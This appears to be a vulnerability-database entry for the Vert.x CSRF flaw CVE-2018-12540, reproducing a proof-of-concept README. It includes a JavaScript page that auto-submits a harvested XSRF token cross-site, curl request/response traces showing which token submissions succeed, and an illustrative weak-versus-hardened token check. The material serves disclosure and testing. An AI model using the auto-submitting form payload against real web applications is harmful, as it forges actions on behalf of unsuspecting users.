Related vulnerability
Title: Eclipse Vert.x cross-site request forgery vulnerability (CVE-2018-12540)
Description: Eclipse Vert.x is a toolkit from the Eclipse Foundation for building reactive applications on the JVM; it is mainly used to build network utilities, web applications, HTTP/REST microservices and similar applications. Eclipse Vert.x versions 3.0.0 through 3.5.2 contain a security vulnerability that arises because the CSRFHandler does not assert that the XSRF cookie matches the returned XSRF 'header'/'form' parameter. An attacker can exploit this to carry out replay attacks.
Description
Vert.X CSRF Proof of Concept (CVE-2018-12540)
Introduction
## Overview ##
The CSRFHandlerImpl (`io.vertx.ext.web.handler.impl.CSRFHandlerImpl`) in Vert.x Web does not create CSRF tokens that are unique per user session. A malicious website can still perform CSRF by obtaining a valid CSRF token, adding it to an HTML form, and then submitting the form to the vulnerable web application.
Currently, the pre-flight CORS OPTIONS HTTP request prevents CSRF via XMLHttpRequest; however, there might be a way to circumvent the pre-flight request.
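The following is an added illustration, not code from the Vert.x project or from this PoC: it models the token layout visible on this page (`base64(salt).timestamp_ms.base64(signature)`) and contrasts a check that only validates the signature with one that also requires the submitted value to equal the `XSRF-TOKEN` cookie the browser sent. The secret, timeout and token-minting routine are constructed assumptions for the demonstration.

```python
import base64, hashlib, hmac, os, time

# Constructed secret and timeout; the real handler's values are not on this page.
SECRET = b"constructed-demo-secret"
TIMEOUT_MS = 30 * 60 * 1000

def mint_token(secret=SECRET, now_ms=None):
    """Issue a signed token: base64(salt).timestamp_ms.base64(HMAC-SHA256(salt.ts))."""
    salt = base64.b64encode(os.urandom(32)).decode()
    ts = str(now_ms if now_ms is not None else int(time.time() * 1000))
    sig = hmac.new(secret, f"{salt}.{ts}".encode(), hashlib.sha256).digest()
    return f"{salt}.{ts}.{base64.b64encode(sig).decode()}"

def well_formed(token, secret=SECRET, now_ms=None):
    """Signature and freshness only: the token is valid, but for nobody in particular."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[1].isdigit():
        return False
    salt, ts, sig = parts
    expected = base64.b64encode(
        hmac.new(secret, f"{salt}.{ts}".encode(), hashlib.sha256).digest()).decode()
    if not hmac.compare_digest(expected, sig):
        return False
    now = now_ms if now_ms is not None else int(time.time() * 1000)
    return now - int(ts) <= TIMEOUT_MS

def weak_check(cookie_token, submitted_token, **kw):
    """Vulnerable pattern: any validly signed token is accepted, whoever it was issued to."""
    return well_formed(submitted_token, **kw)

def hardened_check(cookie_token, submitted_token, **kw):
    """Fixed pattern: the header/form value must also equal the XSRF-TOKEN cookie that
    accompanied the request. A cross-origin page can obtain its own token but cannot read
    or set the victim's cookie, so the two values will not match."""
    if cookie_token is None or submitted_token is None:
        return False
    return hmac.compare_digest(cookie_token, submitted_token) and well_formed(submitted_token, **kw)

def simulate_cross_site_post():
    """Victim holds one token in their cookie; the foreign form carries a different, valid one."""
    victim_cookie = mint_token()      # set on the victim's browser by an earlier GET
    foreign_token = mint_token()      # a separately issued, still validly signed token
    return weak_check(victim_cookie, foreign_token), hardened_check(victim_cookie, foreign_token)
```

The weak check returns True for the foreign token (the behaviour this PoC demonstrates); the hardened check rejects it while still accepting a genuine same-session submission.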
## Building ##
```
mvn clean package
```
## Testing ##
The application starts HTTP endpoints:
* Port 7777 hosts the malicious website
* Port 8888 hosts the target website
Create a host entry for `target.local`, to ensure that the attacker and the target are not on the same domain.
The attacker web server will automatically poll the `target.local:8888` webpage for a valid XSRF token. If a user then navigates to `http://localhost:7777` in their browser, it will render an HTML page with an iframe. The iframe will be populated with a form carrying a valid X-XSRF-TOKEN form field that is automatically submitted to `target.local:8888`.
### Running ###
```
java -jar target/vertx-xsrf-1.0-SNAPSHOT-fat.jar
```
## Observed Behaviour ##
#### Chrome PoC ####

```
<html>
<head>
</head>
<body>
<script>
var xsrftoken = "eWVJYuhAGvXRuaJFwiY7LBDg6Bk0/llUKea9Q8gIWxY=.1528880809229.awJQ69rmd18ATeEVqH0XC1EAjKXYfzPcIEAse9+ym1o=";
var f = document.createElement("form");
f.setAttribute('method', "post");
f.setAttribute('action', "http://target.local:8888/token");
var i = document.createElement("input");
i.setAttribute('type', "text");
i.setAttribute('name', "X-XSRF-TOKEN");
i.setAttribute('value',xsrftoken);
var s = document.createElement("input");
s.setAttribute('type', "submit");
s.setAttribute('value', "Submit");
f.appendChild(i);
f.appendChild(s);
document.getElementsByTagName('body')[0].appendChild(f);
f.submit();
</script>
</body>
</html>
```
#### Obtaining X-XSRF-TOKEN ####
```
curl http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> GET /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: XSRF-TOKEN=KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=; Path=/
< Set-Cookie: vertx-web.session=13c681351dee77d572f4f9b16d0c65a5; Path=/
<
* Connection #0 to host target.local left intact
Success!
```
#### POST without X-XSRF-TOKEN ####
```
curl -X POST http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```
#### Submitting Invalid X-XSRF-Token as HTTP Header ####
```
curl -X POST -H 'X-XSRF-TOKEN: THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=' http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> X-XSRF-TOKEN: THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=
>
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```
#### Submitting X-XSRF-Token as HTTP Header ####
```
curl -X POST -H 'X-XSRF-TOKEN: KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=' http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> X-XSRF-TOKEN: KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=
>
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: vertx-web.session=23b96851535d983b458e92280ffe49f5; Path=/
<
* Connection #0 to host target.local left intact
Success!
```
#### Submitting Invalid X-XSRF-Token as formAttribute ####
```
curl --data 'X-XSRF-TOKEN=THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg%3D.1528880169033.xENGuHNUEXi33wdIkIH%2BHlq7PSS%2B0QJgFQbOIVPnYq8%3D' http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 126
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 126 out of 126 bytes
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```
#### Submitting X-XSRF-Token as formAttribute ####
```
curl --data 'X-XSRF-TOKEN=KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg%3D.1528880169033.xENGuHNUEXi33wdIkIH%2BHlq7PSS%2B0QJgFQbOIVPnYq8%3D' http://target.local:8888/token -v
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 124
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 124 out of 124 bytes
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: vertx-web.session=50deb90796d7babc77860be5ae36ae0e; Path=/
<
* Connection #0 to host target.local left intact
Success!
```
File snapshot
```
[4.0K] /data/pocs/66abd595d07b267d2a5f8e6f4f01f60f685b3a86
├── [118K] browser.png
├── [2.6K] pom.xml
├── [5.6K] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   └── [4.0K] java
    │       └── [4.0K] io
    │           └── [4.0K] vertx
    │               └── [4.0K] example
    │                   └── [4.0K] xsrf
    │                       ├── [ 770] App.java
    │                       ├── [3.4K] AttackerVerticle.java
    │                       └── [1.7K] XSRFVerticle.java
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] io
                └── [4.0K] vertx
                    └── [4.0K] example
                        └── [4.0K] xsrf
                            └── [ 649] AppTest.java

13 directories, 7 files
```